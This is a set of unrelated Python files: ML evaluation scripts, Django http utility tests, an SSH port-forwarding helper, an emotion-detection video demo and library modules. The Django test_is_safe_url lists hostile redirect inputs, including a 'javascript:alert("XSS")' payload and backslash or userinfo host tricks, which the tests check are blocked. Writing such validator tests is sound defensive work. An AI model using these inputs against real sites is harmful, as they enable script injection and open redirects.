from dataset.cityscapes_dataset import cityscapesDataSet
from dataset.dark_zurich_dataset import DarkZurichDataSet
from collections import OrderedDict
import os
from PIL import Image
from utils.tool import fliplr
import matplotlib.pyplot as plt
import torch.nn as nn
import yaml
import time
torch.backends.cudnn.benchmark=True
IMG_MEAN = np.array((104.00698793,116.66876762,122.67891434), dtype=np.float32)
DATA_DIRECTORY = './data/Cityscapes/data'
DATA_LIST_PATH = './dataset/cityscapes_list/val.txt'
SAVE_PATH = './result/cityscapes'
IGNORE_LABEL = 255
NUM_CLASSES = 19
NUM_STEPS = 500 # Number of images in the validation set.
RESTORE_FROM = 'http://vllab.ucmerced.edu/ytsai/CVPR18/GTA2Cityscapes_multi-ed35151c.pth'
RESTORE_FROM_VGG = 'http://vllab.ucmerced.edu/ytsai/CVPR18/GTA2Cityscapes_vgg-ac4ac9f6.pth'
RESTORE_FROM_ORC = 'http://vllab1.ucmerced.edu/~whung/adaptSeg/cityscapes_oracle-b7b9934.pth'
SET = 'test'
MODEL = 'DeeplabMulti'
palette = [128, 64, 128, 244, 35, 232, 70, 70, 70, 102, 102, 156, 190, 153, 153, 153, 153, 153, 250, 170, 30,
220, 220, 0, 107, 142, 35, 152, 251, 152, 70, 130, 180, 220, 20, 60, 255, 0, 0, 0, 0, 142, 0, 0, 70,
0, 60, 100, 0, 80, 100, 0, 0, 230, 119, 11, 32]
zero_pad = 256 * 3 - len(palette)
for i in range(zero_pad):
palette.append(0)
def colorize_mask(mask):
# mask: numpy array of the mask
new_mask = Image.fromarray(mask.astype(np.uint8)).convert('P')
new_mask.putpalette(palette)
return new_mask
def get_arguments():
"""Parse all the arguments provided from the CLI.
Returns:
A list of parsed arguments.
"""
parser = argparse.ArgumentParser(description="DeepLab-ResNet Network")
parser.add_argument("--model", type=str, default=MODEL,
help="Model Choice (DeeplabMulti/DeeplabVGG/Oracle).")
parser.add_argument("--data-dir", type=str, default=DATA_DIRECTORY,
help="Path to the directory containing the Cityscapes dataset.")
parser.add_argument("--data-list", type=str, default=DATA_LIST_PATH,
help="Path to the file listing the images in the dataset.")
parser.add_argument("--ignore-label", type=int, default=IGNORE_LABEL,
help="The index of the label to ignore during the training.")
parser.add_argument("--num-classes", type=int, default=NUM_CLASSES,
help="Number of classes to predict (including background).")
parser.add_argument("--restore-from", type=str, default=RESTORE_FROM,
help="Where restore model parameters from.")
parser.add_argument("--gpu", type=int, default=0,
help="choose gpu device.")
parser.add_argument("--batchsize", type=int, default=8,
help="choose gpu device.")
parser.add_argument("--set", type=str, default=SET,
help="choose evaluation set.")
parser.add_argument("--save", type=str, default=SAVE_PATH,
help="Path to save result.")
return parser.parse_args()
def save(output_name):
output, name = output_name
output_col = colorize_mask(output)
output = Image.fromarray(output)
output.save('%s' % (name))
output_col.save('%s_color.png' % (name.split('.jpg')[0]))
return
def save_heatmap(output_name):
output, name = output_name
fig = plt.figure()
plt.axis('off')
heatmap = plt.imshow(output, cmap='viridis')
#fig.colorbar(heatmap)
fig.savefig('%s_heatmap.png' % (name.split('.jpg')[0]))
return
def save_scoremap(output_name):
output, name = output_name
fig = plt.figure()
plt.axis('off')
heatmap = plt.imshow(output, cmap='viridis')
#fig.colorbar(heatmap)
fig.savefig('%s_scoremap.png' % (name.split('.jpg')[0]))
return
def main():
"""Create the model and start the evaluation process."""
args = get_arguments()
config_path = os.path.join(os.path.dirname(args.restore_from),'opts.yaml')
with open(config_path, 'r') as stream:
config = yaml.load(stream)
args.model = config['model']
print('ModelType:%s'%args.model)
print('NormType:%s'%config['norm_style'])
gpu0 = args.gpu
batchsize = args.batchsize
model_name = os.path.basename( os.path.dirname(args.restore_from) )
args.save += model_name
if not os.path.exists(args.save):
os.makedirs(args.save)
if args.model == 'DeepLab':
model = DeeplabMulti(num_classes=args.num_classes, use_se = config['use_se'], train_bn = False, norm_style = config['norm_style'])
elif args.model == 'Oracle':
model = Res_Deeplab(num_classes=args.num_classes)
if args.restore_from == RESTORE_FROM:
args.restore_from = RESTORE_FROM_ORC
elif args.model == 'DeeplabVGG':
model = DeeplabVGG(num_classes=args.num_classes)
if args.restore_from == RESTORE_FROM:
args.restore_from = RESTORE_FROM_VGG
if args.restore_from[:4] == 'http' :
saved_state_dict = model_zoo.load_url(args.restore_from)
else:
saved_state_dict = torch.load(args.restore_from)
try:
model.load_state_dict(saved_state_dict)
except:
model = torch.nn.DataParallel(model)
model.load_state_dict(saved_state_dict)
#model = torch.nn.DataParallel(model)
model.eval()
model.cuda(gpu0)
testloader = data.DataLoader(DarkZurichDataSet(args.data_dir, args.data_list, crop_size=(512, 1024), resize_size=(1024, 512), mean=IMG_MEAN, scale=False, mirror=False, set=args.set),
batch_size=batchsize, shuffle=False, pin_memory=True, num_workers=4)
scale = 1.25
testloader2 = data.DataLoader(DarkZurichDataSet(args.data_dir, args.data_list, crop_size=(round(512*scale), round(1024*scale) ), resize_size=( round(1024*scale), round(512*scale)), mean=IMG_MEAN, scale=False, mirror=False, set=args.set),
batch_size=batchsize, shuffle=False, pin_memory=True, num_workers=4)
scale = 0.9
testloader3 = data.DataLoader(DarkZurichDataSet(args.data_dir, args.data_list, crop_size=(round(512*scale), round(1024*scale) ), resize_size=( round(1024*scale), round(512*scale)), mean=IMG_MEAN, scale=False, mirror=False, set=args.set),
batch_size=batchsize, shuffle=False, pin_memory=True, num_workers=4)
if version.parse(torch.__version__) >= version.parse('0.4.0'):
interp = nn.Upsample(size=(1024, 2048), mode='bilinear', align_corners=True)
else:
interp = nn.Upsample(size=(1024, 2048), mode='bilinear')
sm = torch.nn.Softmax(dim = 1)
log_sm = torch.nn.LogSoftmax(dim = 1)
kl_distance = nn.KLDivLoss( reduction = 'none')
for index, img_data in enumerate(zip(testloader, testloader2, testloader3)):
batch, batch2, batch3 = img_data
image, _, name = batch
image2, _, name2 = batch2
#image3, _, _, name3 = batch3
inputs = image.cuda()
inputs2 = image2.cuda()
#inputs3 = Variable(image3).cuda()
print('\r>>>>Extracting feature...%03d/%03d'%(index*batchsize, len(testloader)), end='')
if args.model == 'DeepLab':
with torch.no_grad():
output1, output2 = model(inputs)
output_batch = interp(sm(0.5* output1 + output2))
heatmap_output1, heatmap_output2 = output1, output2
#output_batch = interp(sm(output1))
#output_batch = interp(sm(output2))
output1, output2 = model(fliplr(inputs))
output1, output2 = fliplr(output1), fliplr(output2)
output_batch += interp(sm(0.5 * output1 + output2))
heatmap_output1, heatmap_output2 = heatmap_output1+output1, heatmap_output2+output2
#output_batch += interp(sm(output1))
#output_batch += interp(sm(output2))
del output1, output2, inputs
output1, output2 = model(inputs2)
output_batch += interp(sm(0.5* output1 + output2))
#output_batch += interp(sm(output1))
#output_batch += interp(sm(output2))
output1, output2 = model(fliplr(inputs2))
output1, output2 = fliplr(output1), fliplr(output2)
output_batch += interp(sm(0.5 * output1 + output2))
#output_batch += interp(sm(output1))
#output_batch += interp(sm(output2))
del output1, output2, inputs2
output_batch = output_batch.cpu().data.numpy()
heatmap_batch = torch.sum(kl_distance(log_sm(heatmap_output1), sm(heatmap_output2)), dim=1)
heatmap_batch = torch.log(1 + 10*heatmap_batch) # for visualization
heatmap_batch = heatmap_batch.cpu().data.numpy()
#output1, output2 = model(inputs3)
#output_batch += interp(sm(0.5* output1 + output2)).cpu().data.numpy()
#output1, output2 = model(fliplr(inputs3))
#output1, output2 = fliplr(output1), fliplr(output2)
#output_batch += interp(sm(0.5 * output1 + output2)).cpu().data.numpy()
#del output1, output2, inputs3
elif args.model == 'DeeplabVGG' or args.model == 'Oracle':
output_batch = model(Variable(image).cuda())
output_batch = interp(output_batch).cpu().data.numpy()
output_batch = output_batch.transpose(0,2,3,1)
scoremap_batch = np.asarray(np.max(output_batch, axis=3))
output_batch = np.asarray(np.argmax(output_batch, axis=3), dtype=np.uint8)
output_iterator = []
heatmap_iterator = []
scoremap_iterator = []
for i in range(output_batch.shape[0]):
output_iterator.append(output_batch[i,:,:])
heatmap_iterator.append(heatmap_batch[i,:,:]/np.max(heatmap_batch[i,:,:]))
scoremap_iterator.append(1-scoremap_batch[i,:,:]/np.max(scoremap_batch[i,:,:]))
name_tmp = name[i].split('/')[-1]
name[i] = '%s/%s' % (args.save, name_tmp)
with Pool(4) as p:
p.map(save, zip(output_iterator, name) )
p.map(save_heatmap, zip(heatmap_iterator, name) )
p.map(save_scoremap, zip(scoremap_iterator, name) )
del output_batch
return args.save
if __name__ == '__main__':
tt = time.time()
with torch.no_grad():
save_path = main()
print('Time used: {} sec'.format(time.time()-tt))
# os.system('python compute_iou.py ./data/Cityscapes/data/gtFine/val %s'%save_path)
|
the-stack_106_15839
|
import unittest
from datetime import datetime
from django.utils import http
from django.utils.datastructures import MultiValueDict
class TestUtilsHttp(unittest.TestCase):
def test_urlencode(self):
# 2-tuples (the norm)
result = http.urlencode((('a', 1), ('b', 2), ('c', 3)))
self.assertEqual(result, 'a=1&b=2&c=3')
# A dictionary
result = http.urlencode({'a': 1, 'b': 2, 'c': 3})
acceptable_results = [
# Need to allow all of these as dictionaries have to be treated as
# unordered
'a=1&b=2&c=3',
'a=1&c=3&b=2',
'b=2&a=1&c=3',
'b=2&c=3&a=1',
'c=3&a=1&b=2',
'c=3&b=2&a=1'
]
self.assertIn(result, acceptable_results)
result = http.urlencode({'a': [1, 2]}, doseq=False)
self.assertEqual(result, 'a=%5B%271%27%2C+%272%27%5D')
result = http.urlencode({'a': [1, 2]}, doseq=True)
self.assertEqual(result, 'a=1&a=2')
result = http.urlencode({'a': []}, doseq=True)
self.assertEqual(result, '')
# A MultiValueDict
result = http.urlencode(MultiValueDict({
'name': ['Adrian', 'Simon'],
'position': ['Developer']
}), doseq=True)
acceptable_results = [
# MultiValueDicts are similarly unordered
'name=Adrian&name=Simon&position=Developer',
'position=Developer&name=Adrian&name=Simon'
]
self.assertIn(result, acceptable_results)
def test_base36(self):
# reciprocity works
for n in [0, 1, 1000, 1000000]:
self.assertEqual(n, http.base36_to_int(http.int_to_base36(n)))
# bad input
with self.assertRaises(ValueError):
http.int_to_base36(-1)
for n in ['1', 'foo', {1: 2}, (1, 2, 3), 3.141]:
with self.assertRaises(TypeError):
http.int_to_base36(n)
for n in ['#', ' ']:
with self.assertRaises(ValueError):
http.base36_to_int(n)
with self.assertRaises(ValueError) as cm:
http.base36_to_int('1' * 14)
self.assertEqual('Base36 input too large', str(cm.exception))
for n in [123, {1: 2}, (1, 2, 3), 3.141]:
with self.assertRaises(TypeError):
http.base36_to_int(n)
# more explicit output testing
for n, b36 in [(0, '0'), (1, '1'), (42, '16'), (818469960, 'django')]:
self.assertEqual(http.int_to_base36(n), b36)
self.assertEqual(http.base36_to_int(b36), n)
def test_is_safe_url(self):
bad_urls = (
'http://example.com',
'http:///example.com',
'https://example.com',
'ftp://example.com',
r'\\example.com',
r'\\\example.com',
r'/\\/example.com',
r'\\\example.com',
r'\\example.com',
r'\\//example.com',
r'/\/example.com',
r'\/example.com',
r'/\example.com',
'http:///example.com',
r'http:/\//example.com',
r'http:\/example.com',
r'http:/\example.com',
'javascript:alert("XSS")',
'\njavascript:alert(x)',
'\x08//example.com',
r'http://otherserver\@example.com',
r'http:\\testserver\@example.com',
r'http://testserver\me:[email protected]',
r'http://testserver\@example.com',
r'http:\\testserver\confirm\[email protected]',
'http:999999999',
'ftp:9999999999',
'\n',
'http://[2001:cdba:0000:0000:0000:0000:3257:9652/',
'http://2001:cdba:0000:0000:0000:0000:3257:9652]/',
)
for bad_url in bad_urls:
self.assertFalse(
http.is_safe_url(bad_url, allowed_hosts={'testserver', 'testserver2'}),
"%s should be blocked" % bad_url,
)
good_urls = (
'/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://example.com',
'view/?param=//example.com',
'https://testserver/',
'HTTPS://testserver/',
'//testserver/',
'http://testserver/[email protected]',
'/url%20with%20spaces/',
'path/http:2222222222',
)
for good_url in good_urls:
self.assertTrue(
http.is_safe_url(good_url, allowed_hosts={'otherserver', 'testserver'}),
"%s should be allowed" % good_url,
)
# Valid basic auth credentials are allowed.
self.assertTrue(http.is_safe_url(r'http://user:pass@testserver/', allowed_hosts={'user:pass@testserver'}))
# A path without host is allowed.
self.assertTrue(http.is_safe_url('/confirm/[email protected]'))
# Basic auth without host is not allowed.
self.assertFalse(http.is_safe_url(r'http://testserver\@example.com'))
def test_is_safe_url_secure_param_https_urls(self):
secure_urls = (
'https://example.com/p',
'HTTPS://example.com/p',
'/view/?param=http://example.com',
)
for url in secure_urls:
self.assertTrue(http.is_safe_url(url, allowed_hosts={'example.com'}, require_https=True))
def test_is_safe_url_secure_param_non_https_urls(self):
not_secure_urls = (
'http://example.com/p',
'ftp://example.com/p',
'//example.com/p',
)
for url in not_secure_urls:
self.assertFalse(http.is_safe_url(url, allowed_hosts={'example.com'}, require_https=True))
def test_urlsafe_base64_roundtrip(self):
bytestring = b'foo'
encoded = http.urlsafe_base64_encode(bytestring)
decoded = http.urlsafe_base64_decode(encoded)
self.assertEqual(bytestring, decoded)
def test_urlquote(self):
self.assertEqual(http.urlquote('Paris & Orl\xe9ans'), 'Paris%20%26%20Orl%C3%A9ans')
self.assertEqual(http.urlquote('Paris & Orl\xe9ans', safe="&"), 'Paris%20&%20Orl%C3%A9ans')
self.assertEqual(http.urlunquote('Paris%20%26%20Orl%C3%A9ans'), 'Paris & Orl\xe9ans')
self.assertEqual(http.urlunquote('Paris%20&%20Orl%C3%A9ans'), 'Paris & Orl\xe9ans')
self.assertEqual(http.urlquote_plus('Paris & Orl\xe9ans'), 'Paris+%26+Orl%C3%A9ans')
self.assertEqual(http.urlquote_plus('Paris & Orl\xe9ans', safe="&"), 'Paris+&+Orl%C3%A9ans')
self.assertEqual(http.urlunquote_plus('Paris+%26+Orl%C3%A9ans'), 'Paris & Orl\xe9ans')
self.assertEqual(http.urlunquote_plus('Paris+&+Orl%C3%A9ans'), 'Paris & Orl\xe9ans')
def test_is_same_domain_good(self):
for pair in (
('example.com', 'example.com'),
('example.com', '.example.com'),
('foo.example.com', '.example.com'),
('example.com:8888', 'example.com:8888'),
('example.com:8888', '.example.com:8888'),
('foo.example.com:8888', '.example.com:8888'),
):
self.assertTrue(http.is_same_domain(*pair))
def test_is_same_domain_bad(self):
for pair in (
('example2.com', 'example.com'),
('foo.example.com', 'example.com'),
('example.com:9999', 'example.com:8888'),
):
self.assertFalse(http.is_same_domain(*pair))
class ETagProcessingTests(unittest.TestCase):
def test_parsing(self):
self.assertEqual(
http.parse_etags(r'"" , "etag", "e\\tag", W/"weak"'),
['""', '"etag"', r'"e\\tag"', 'W/"weak"']
)
self.assertEqual(http.parse_etags('*'), ['*'])
# Ignore RFC 2616 ETags that are invalid according to RFC 7232.
self.assertEqual(http.parse_etags(r'"etag", "e\"t\"ag"'), ['"etag"'])
def test_quoting(self):
self.assertEqual(http.quote_etag('etag'), '"etag"') # unquoted
self.assertEqual(http.quote_etag('"etag"'), '"etag"') # quoted
self.assertEqual(http.quote_etag('W/"etag"'), 'W/"etag"') # quoted, weak
class HttpDateProcessingTests(unittest.TestCase):
def test_http_date(self):
t = 1167616461.0
self.assertEqual(http.http_date(t), 'Mon, 01 Jan 2007 01:54:21 GMT')
def test_cookie_date(self):
t = 1167616461.0
self.assertEqual(http.cookie_date(t), 'Mon, 01-Jan-2007 01:54:21 GMT')
def test_parsing_rfc1123(self):
parsed = http.parse_http_date('Sun, 06 Nov 1994 08:49:37 GMT')
self.assertEqual(datetime.utcfromtimestamp(parsed), datetime(1994, 11, 6, 8, 49, 37))
def test_parsing_rfc850(self):
parsed = http.parse_http_date('Sunday, 06-Nov-94 08:49:37 GMT')
self.assertEqual(datetime.utcfromtimestamp(parsed), datetime(1994, 11, 6, 8, 49, 37))
def test_parsing_asctime(self):
parsed = http.parse_http_date('Sun Nov 6 08:49:37 1994')
self.assertEqual(datetime.utcfromtimestamp(parsed), datetime(1994, 11, 6, 8, 49, 37))
|
the-stack_106_15841
|
import numpy as np
import pandas as pd
from copy import copy, deepcopy
from matplotlib import pyplot as plt
from datetime import datetime, timedelta
from matplotlib.backends.backend_pdf import PdfPages
dfheight=pd.read_csv('../data/raw/Results from Val_Roseg_Timelapse in µm per sec.csv')
dfdates=pd.read_csv('../data/raw/image_dates.csv',parse_dates=['time'])
dfw=pd.read_csv('../data/raw/water_dates.csv',parse_dates=['time'])
dfheight=dfheight['Y']
dfheight=3000-dfheight
dfheight=dfheight-1164 #Subtracting additional length from camera
dfheight*=6/170 #170 pixels=6ft
dfh=pd.DataFrame(columns=['time','height','water'])
dfh['time']=dfdates['time']
dfh['water']=dfw['water']
dfh['time']=pd.to_datetime(dfh['time'],format='%Y:%m:%d %H:%M:%S')
dfh['height']=dfheight.apply(lambda x: float(x)*0.3048)
dfh=dfh.set_index('time')
dfh.to_csv('../data/interim/height_data.csv')
df=pd.read_csv('../data/raw/Roseg excel.csv')
df.columns=['doy','time','temp','rh','ws']
df['time']=df['time']/100
d=df['time']
d=d.tolist()
c=df['doy'].tolist()
for i in range(0,df.shape[0]):
if c[i]>300:
df.loc[i,'time']=datetime(2016, 1, 1) + timedelta(days=c[i]-1,hours=d[i])
else:
df.loc[i,'time']=datetime(2017, 1, 1) + timedelta(days=c[i]-1,hours=d[i])
df=df.set_index('time')
for time in dfh.index:
h=dfh.loc[str(time),'height']
w=dfh.loc[str(time),'water']
time=time.replace(hour=time.hour+1,minute=0,second=0)
df.loc[str(time),'height']=h
df.loc[str(time),'water']=w
df=df.dropna()
df.to_csv('../data/interim/roseg_measurements.csv')
pp = PdfPages('../data/processed/plots.pdf')
df['temp'].plot(figsize=(12,8), grid=True)
df['height'].plot(figsize=(12,8), grid=True)
df['water'].plot(figsize=(12,8), grid=True)
pp.savefig()
plt.clf()
pp.close()
|
the-stack_106_15844
|
import select
import socket
import threading
try:
import SocketServer
except ImportError:
import socketserver as SocketServer
def check_if_ipv6(ip):
try:
socket.inet_pton(socket.AF_INET6, ip)
return True
except socket.error:
return False
class LocalPortForwarding:
def __init__(self, port, host, transport):
self.server = None
self.port = port
self.host = host
self.transport = transport
def forward(self, local_port):
class SubHandler(LocalPortForwardingHandler):
port = self.port
host = self.host
ssh_transport = self.transport
self.server = ForwardServer(('', local_port), SubHandler, ipv6=check_if_ipv6(self.host))
t = threading.Thread(target=self.server.serve_forever)
t.setDaemon(True)
t.start()
def close(self):
if self.server:
self.server.shutdown()
class ForwardServer(SocketServer.ThreadingTCPServer):
daemon_threads = True
allow_reuse_address = True
def __init__(self, server_address, RequestHandlerClass, ipv6=False):
if ipv6:
ForwardServer.address_family = socket.AF_INET6
SocketServer.ThreadingTCPServer.__init__(self, server_address, RequestHandlerClass, bind_and_activate=True)
class LocalPortForwardingHandler(SocketServer.BaseRequestHandler):
host, port, ssh_transport = None, None, None
def handle(self):
try:
chan = self.ssh_transport.open_channel('direct-tcpip', (self.host, self.port),
self.request.getpeername())
except Exception:
return
if chan is None:
return
while True:
r, w, x = select.select([self.request, chan], [], [])
if self.request in r:
data = self.request.recv(1024)
if len(data) == 0:
break
chan.send(data)
if chan in r:
data = chan.recv(1024)
if len(data) == 0:
break
self.request.send(data)
chan.close()
self.request.close()
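# Hypothetical usage sketch (not part of the original module); it assumes an
# already-connected paramiko Transport object named `transport`:
#
#   forwarder = LocalPortForwarding(80, "remote.example.com", transport)
#   forwarder.forward(8080)  # serve in a daemon thread; localhost:8080 -> remote.example.com:80
#   ...
#   forwarder.close()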
|
the-stack_106_15845
|
import random
import pytest
from aiohttp_apiset.jinja2 import template
@template('fake.html')
def handler(request):
return {'req': request}
@template('fake.html')
async def handler2(request):
return {'req': request}
@pytest.mark.parametrize('handler', [
handler, handler2
])
async def test_with_req(swagger_router, handler, mocker):
route = swagger_router.add_route(
'GET', '/jinja2/handler{}'.format(random.randrange(0, 999)), handler)
m = mocker.patch('aiohttp_apiset.jinja2.render_template')
response = await route.handler('request')
assert response is m()
@template('fake.html')
def handler_():
return {}
async def test_without_req(swagger_router, mocker):
route = swagger_router.add_route(
'GET', '/jinja2/handler{}'.format(random.randrange(0, 999)), handler_)
m = mocker.patch('aiohttp_apiset.jinja2.render_template')
response = await route.handler()
assert response is m()
|
the-stack_106_15847
|
# import os
# import cv2
# import numpy as np
#
# INPUT_VIDEO = 'test.mp4'
# OUTPUT_IMG = 'out_my_video'
# os.makedirs(OUTPUT_IMG, exist_ok=True)
#
#
# def print_image(img, frame_diff):
# """
# Place images side-by-side
# """
# new_img = np.zeros([img.shape[0], img.shape[1] * 2, img.shape[2]]) # [height, width*2, channel]
# new_img[:, :img.shape[1], :] = img # place color image on the left side
# new_img[:, img.shape[1]:, 0] = frame_diff # place gray image on the right side
# new_img[:, img.shape[1]:, 1] = frame_diff
# new_img[:, img.shape[1]:, 2] = frame_diff
# return new_img
#
#
# def main(video_path):
# cap = cv2.VideoCapture(video_path) # https://docs.opencv.org/4.0.0/d8/dfe/classcv_1_1VideoCapture.html
# last_gray = None
# idx = -1
# while (True):
# ret, frame = cap.read() # read frames
# idx += 1
# if not ret:
# print('Stopped reading the video (%s)' % video_path)
# break
#
# gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # convert color image to gray
#
# if last_gray is None:
# last_gray = gray
# continue
#
# diff = cv2.absdiff(gray,
# last_gray) # frame difference! https://docs.opencv.org/4.0.0/d2/de8/group__core__array.html#ga6fef31bc8c4071cbc114a758a2b79c14
# cv2.imwrite(os.path.join(OUTPUT_IMG, 'img_%06d.jpg' % idx), print_image(frame, diff))
# last_gray = gray
# print('Done image @ %d...' % idx)
# pass
# pass
#
#
# if __name__ == "__main__":
# print('Running frame difference algorithm on %s' % INPUT_VIDEO)
# main(video_path=INPUT_VIDEO)
# print('* Follow me @ ' + "\x1b[1;%dm" % (34) + ' https://www.facebook.com/minhng.info/' + "\x1b[0m")
# print('* Join GVGroup for discussion @ ' + "\x1b[1;%dm" % (
# 34) + 'https://www.facebook.com/groups/ip.gvgroup/' + "\x1b[0m")
# print('* Thank you ^^~')
#
# print('[NOTE] Run the following command to turn you images in to video:')
# print(
# 'ffmpeg -framerate 24 -f image2 -start_number 1 -i out_my_video/img_%*.jpg -crf 10 -q:v 5 -pix_fmt yuv420p out_video.mp4')
# import the necessary packages
from imutils.video import VideoStream
import argparse
import datetime
import imutils
import time
import cv2
import numpy as np
from keras.models import model_from_json
from keras.preprocessing.image import img_to_array
# parameters for loading data and images
detection_model_path = 'haarcascade/haarcascade_frontalface_default.xml'
# loading models
# load model facial_expression
model_facial_expression = model_from_json(open("model/fer.json", "r").read())
# load weights facial_expression
model_facial_expression.load_weights('model/fer.h5')
EMOTIONS = ["angry", "disgust", "scared", "happy", "sad", "surprised", "neutral"]
face_detection = cv2.CascadeClassifier(detection_model_path)
path_video = "democlassroom.mp4"
video = cv2.VideoCapture(path_video)
width = int(video.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(video.get(cv2.CAP_PROP_FRAME_HEIGHT))
size = width, height
# Print out the resolution
print(repr(size))
# Set the number of frames and the background
FPS_SMOOTHING = 0.9
# ret, frame1 = video.read()
ret, frame2 = video.read()
frame1 = None
next_frame = 0
fps = 0.0
prev = time.time()
while video.isOpened():
status, color = "No Movement", (0, 255, 0)
no_movement_check = False
now = time.time()
fps = (fps * FPS_SMOOTHING + (1 / (now - prev)) * (1.0 - FPS_SMOOTHING))
print("fps: {:.1f}".format(fps))
ret, frame2 = video.read()
if frame2 is None:
break
if frame1 is None:
frame1 = frame2
difference = cv2.absdiff(frame1, frame2)
thresh = cv2.threshold(difference, 25, 255, cv2.THRESH_BINARY)[1]
gray = cv2.cvtColor(difference, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(gray, (5,5), 0)
_, threshold = cv2.threshold(blur, 20, 255, cv2.THRESH_BINARY)
dilate = cv2.dilate(threshold, None, iterations=3)
contour, _ = cv2.findContours(dilate, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cnts= cv2.findContours(dilate.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
# loop over the contours
# for c in cnts:
# # if the contour is too small, ignore it
# # if cv2.contourArea(c) < args["min_area"]:
# # continue
# # compute the bounding box for the contour, draw it on the frame,
# # and update the text
# (x, y, w, h) = cv2.boundingRect(c)
# cv2.rectangle(frame1, (x, y), (x + w, y + h), (0, 255, 0), 2)
# status = "Occupied"
# no_movement_check = True
if len(cnts) > 0:
status = "Occupied"
no_movement_check = True
if next_frame %2 == 0 and no_movement_check:
gray_face = cv2.cvtColor(frame2, cv2.COLOR_BGR2GRAY)
faces = face_detection.detectMultiScale(gray_face, scaleFactor=1.1, minNeighbors=5, minSize=(30, 30),
flags=cv2.CASCADE_SCALE_IMAGE)
print("Kieru gì"+ str(type(faces)))
for (x, y, w, h) in faces:
if y+w >10 and x+h >10:
# cv2.rectangle(frame1, (x_f, y_f), (x_f + w_f, y_f + h_f), (255, 0, 0), 2)
roi = gray_face[y:y + h, x:x + w]  # crop the detected face from the grayscale frame
roi = cv2.resize(roi, (48, 48))
roi = roi.astype("float") / 255.0
roi = img_to_array(roi)
roi = np.expand_dims(roi, axis=0)
preds = model_facial_expression.predict(roi)[0]
# emotion_probability = np.max(preds)
label = EMOTIONS[preds.argmax()]
cv2.putText(frame1, label, (int(x), int(y)), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)
# cv2.drawContours(frame1, contour, -1, (0, 0, 255), 2)
cv2.putText(frame1, status, (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.8, color, 2)
cv2.putText(frame1, datetime.datetime.now().strftime("%A %d %B %Y %I:%M:%S%p"), (10, frame1.shape[0] - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 255, 0), 1)
# cv2.putText(frame1, "Fps: " + str(difference), (7, 70), cv2.FONT_HERSHEY_SIMPLEX, 1, (100, 255, 0), 1, cv2.LINE_AA)
cv2.imshow("image", frame1)
frame1 = frame2
next_frame +=1
if cv2.waitKey(40) == ord('q'):
break
video.release()
|
the-stack_106_15851
|
"""Utility methods for Mycroft Precise."""
class TriggerDetector:
"""
Reads predictions and detects activations
This prevents multiple close activations from occurring when
the predictions look like ...!!!..!!...
NOTE: Taken from precise-runner source code
"""
def __init__(self, chunk_size, sensitivity=0.5, trigger_level=3):
self.chunk_size = chunk_size
self.sensitivity = sensitivity
self.trigger_level = trigger_level
self.activation = 0
def update(self, prob):
# type: (float) -> bool
"""Returns whether the new prediction caused an activation"""
chunk_activated = prob > 1.0 - self.sensitivity
if chunk_activated or self.activation < 0:
self.activation += 1
has_activated = self.activation > self.trigger_level
if has_activated or chunk_activated and self.activation < 0:
self.activation = -(8 * 2048) // self.chunk_size
if has_activated:
return True
elif self.activation > 0:
self.activation -= 1
return False
|
the-stack_106_15852
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .custom import http_bearer_challenge_cache as HttpBearerChallengeCache
from .custom.http_bearer_challenge import HttpBearerChallenge
from .custom.key_vault_client import CustomKeyVaultClient as KeyVaultClient
from .custom.key_vault_id import (KeyVaultId,
KeyId,
SecretId,
CertificateId,
CertificateIssuerId,
CertificateOperationId,
StorageAccountId,
StorageSasDefinitionId)
from .custom.key_vault_authentication import KeyVaultAuthentication, KeyVaultAuthBase
from .version import VERSION
__all__ = ['KeyVaultClient',
'KeyVaultId',
'KeyId',
'SecretId',
'CertificateId',
'CertificateIssuerId',
'CertificateOperationId',
'StorageAccountId',
'StorageSasDefinitionId',
'HttpBearerChallengeCache',
'HttpBearerChallenge',
'KeyVaultAuthentication',
'KeyVaultAuthBase']
__version__ = VERSION
|
the-stack_106_15853
|
class Solution:
# @param s, a string
# @return a string
def reverseWords(self, s):
if s is None:
return
s = s.strip()
words = s.split()
words.reverse()
s = " ".join(words)
return s
|
the-stack_106_15854
|
"""
To understand why this file is here, please read:
http://cookiecutter-django.readthedocs.io/en/latest/faq.html#why-is-there-a-django-contrib-sites-directory-in-cookiecutter-django
"""
from django.conf import settings
from django.db import migrations
def update_site_forward(apps, schema_editor):
"""Set site domain and name."""
Site = apps.get_model("sites", "Site")
Site.objects.update_or_create(
id=settings.SITE_ID,
defaults={
"domain": "e-kondr01.ru",
"name": "RCS Back",
},
)
def update_site_backward(apps, schema_editor):
"""Revert site domain and name to default."""
Site = apps.get_model("sites", "Site")
Site.objects.update_or_create(
id=settings.SITE_ID, defaults={"domain": "example.com", "name": "example.com"}
)
class Migration(migrations.Migration):
dependencies = [("sites", "0002_alter_domain_unique")]
operations = [migrations.RunPython(update_site_forward, update_site_backward)]
|
the-stack_106_15856
|
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve
import numpy as np
from federatedml.util import consts
import logging
from federatedml.util import LOGGER
from federatedml.evaluation.metrics import classification_metric
from federatedml.evaluation.metrics import regression_metric
from federatedml.evaluation.metrics import clustering_metric
from functools import wraps
class MetricInterface(object):
def __init__(self, pos_label: int, eval_type: str):
self.pos_label = pos_label
self.eval_type = eval_type
def auc(self, labels, pred_scores):
"""
Compute AUC for binary classification.
Parameters
----------
labels: value list. The labels of data set.
pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
Returns
----------
float
The AUC
"""
if self.eval_type == consts.BINARY:
return roc_auc_score(labels, pred_scores)
elif self.eval_type == consts.ONE_VS_REST:
try:
score = roc_auc_score(labels, pred_scores)
            except ValueError:  # roc_auc_score raises ValueError when only one class is present
score = 0 # in case all labels are 0 or 1
